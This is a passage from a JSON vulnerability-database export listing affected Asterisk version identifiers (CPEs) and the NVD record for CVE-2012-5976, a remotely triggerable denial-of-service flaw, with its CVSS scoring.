"cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert7:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert8:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc4:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc3:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert6:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.16.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.1:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc3:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:10.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc3:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.1:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert4:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.1:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.2:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.16.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:32:05", "description": "Multiple 
stack consumption vulnerabilities in Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones allow remote attackers to cause a denial of service (daemon crash) via TCP data using the (1) SIP, (2) HTTP, or (3) XMPP protocol.", "cvss3": {}, "published": "2013-01-04T11:52:00", "type": "cve", "title": "CVE-2012-5976", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976"], "modified": "2013-02-02T05:10:00", "cpe": ["cpe:/a:digium:asterisk:1.8.2", "cpe:/a:digium:asterisk:10.5.1", "cpe:/a:digium:asterisk:1.8.3.2", "cpe:/a:digium:asterisk:1.8.2.4", "cpe:/a:digium:asterisk:10.5.2", "cpe:/a:digium:asterisk:10.3.1", "cpe:/a:digium:asterisk:10.7.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk:1.8.3.3", "cpe:/a:digium:certified_asterisk:1.8.11", "cpe:/a:digium:asterisk:1.8.8.1", "cpe:/a:digium:asterisk:1.8.0", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:1.8.4", "cpe:/a:digium:asterisk:1.8.11.1", "cpe:/a:digium:asterisk:1.8.3.1", "cpe:/a:digium:asterisk:1.8.7.0", "cpe:/a:digium:asterisk:1.8.3", "cpe:/a:digium:asterisk:1.8.9.2", "cpe:/a:digium:asterisk:1.8.1.1", "cpe:/a:digium:asterisk:10.1.0", "cpe:/a:digium:asterisk:1.8.10.0", "cpe:/a:digium:asterisk:1.8.15.0", "cpe:/a:digium:asterisk:1.8.6.0", "cpe:/a:digium:asterisk:10.6.0", "cpe:/a:digium:asterisk:1.8.9.3", "cpe:/a:digium:asterisk:11.0.1", 
"cpe:/a:digium:asterisk:1.8.4.1", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:10.3.0", "cpe:/a:digium:asterisk:1.8.14.1", "cpe:/a:digium:asterisk:1.8.5", "cpe:/a:digium:asterisk:10.11.0", "cpe:/a:digium:asterisk:10.6.1", "cpe:/a:digium:asterisk:1.8.4.2", "cpe:/a:digium:asterisk:10.4.1", "cpe:/a:digium:asterisk:10.1.3", "cpe:/a:digium:asterisk:1.8.15.1", "cpe:/a:digium:asterisk:1.8.16.0", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk:1.8.2.1", "cpe:/a:digium:asterisk:10.5.0", "cpe:/a:digium:asterisk:10.0.1", "cpe:/a:digium:asterisk:1.8.12", "cpe:/a:digium:asterisk:1.8.11.0", "cpe:/a:digium:asterisk:10.10.1", "cpe:/a:digium:asterisk:1.8.12.0", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:asterisk:1.8.2.2", "cpe:/a:digium:asterisk:10.0.0", "cpe:/a:digium:asterisk:10.8.0", "cpe:/a:digium:asterisk:1.8.9.0", "cpe:/a:digium:asterisk:10.4.0", "cpe:/a:digium:asterisk:1.8.2.3", "cpe:/a:digium:asterisk:1.8.18.1", "cpe:/a:digium:asterisk:10.1.1", "cpe:/a:digium:asterisk:1.8.7.1", "cpe:/a:digium:asterisk:1.8.13.0", "cpe:/a:digium:asterisk:10.1.2", "cpe:/a:digium:asterisk:1.8.8.0", "cpe:/a:digium:asterisk:1.8.8.2", "cpe:/a:digium:asterisk:10.10.0", "cpe:/a:digium:asterisk:10.7.1", "cpe:/a:digium:asterisk:1.8.1", "cpe:/a:digium:asterisk:1.8.14.0", "cpe:/a:digium:asterisk:1.8.13.1", "cpe:/a:digium:asterisk:10.2.0", "cpe:/a:digium:asterisk:1.8.4.4", "cpe:/a:digium:asterisk:1.8.4.3", "cpe:/a:digium:asterisk:1.8.5.0", "cpe:/a:digium:asterisk:10.2.1", "cpe:/a:digium:asterisk:1.8.9.1", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:1.8.1.2", "cpe:/a:digium:asterisk:1.8.10.1", "cpe:/a:digium:asterisk:10.4.2", "cpe:/a:digium:asterisk:10.9.0", "cpe:/a:digium:asterisk:11.0.2"], "id": "CVE-2012-5976", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5976", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:10.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert9:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert7:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert8:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta1:digiumphones:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc4:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc3:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.7.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert5:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert6:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.16.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.1:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*", 